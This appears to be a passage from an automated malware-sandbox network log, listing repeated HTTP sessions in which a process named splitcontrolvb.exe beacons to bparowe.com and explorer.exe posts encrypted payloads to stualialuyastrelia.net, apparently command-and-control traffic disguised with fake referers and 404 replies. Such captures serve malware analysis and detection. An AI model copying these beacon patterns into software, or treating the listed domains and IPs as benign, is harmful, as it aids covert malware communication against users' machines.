                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:25.237900972 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:25.520119905 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                176192.168.2.456141185.196.8.2280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:25.953839064 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:26.231688976 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                177192.168.2.456142185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:26.694149017 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:26.970227003 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                178192.168.2.456143185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:27.484205008 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:27.763936043 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                179192.168.2.456144185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:28.260138988 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:28.538621902 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                180192.168.2.45614591.215.85.17802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:28.799798012 CET278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://qwylvowtnlb.org/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:28.799829960 CET109OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:29.094146967 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                181192.168.2.456146185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:28.991314888 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:29.269184113 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                182192.168.2.456147185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:29.804061890 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:30.078217030 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                183192.168.2.456148185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:30.553392887 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:30.830872059 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                184192.168.2.456149185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:31.271609068 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:31.550403118 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:31 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                185192.168.2.456150185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:32.040944099 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:32.318981886 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                186192.168.2.45615191.215.85.17802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:32.625397921 CET283OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://mioaiveaskiatypa.com/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 109
                                                                                                                                                                                                                                                                                                                                Host: stualialuyastrelia.net
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:32.625431061 CET109OUTData Raw: 48 9d 8e cc 3b 67 52 24 2a 0a 26 27 7e ac 56 cb 5e 66 e8 16 fd 6a d7 aa c6 6c a0 86 76 f7 a7 96 fb ad fb c4 03 46 ee b1 a7 5e 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd
                                                                                                                                                                                                                                                                                                                                Data Ascii: H;gR$*&'~V^fjlvF^j~_=;}f=B!bONfy&5c50
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:32.917182922 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                187192.168.2.456152185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:32.784686089 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:33.058783054 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                188192.168.2.456153185.196.8.2280
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:33.574805021 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:33.854322910 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                189192.168.2.456154185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:34.360912085 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:34.638927937 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                190192.168.2.456155185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:35.147553921 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:35.428539991 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:35 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                191192.168.2.456156185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:35.964871883 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:36.245960951 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:04:36 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: ede2ff49a2e11370


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                192192.168.2.456157185.196.8.22805104C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:36.937238932 CET307OUTGET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842945eea4ae9a4a21bca13c034069638dc1a959d3c3c6c5da3282076c681337acc84da230e16d6d607fe11cdd85fb2223b19 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: bparowe.com
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:04:37.220735073 CET220INHTTP/1.1 200 OK
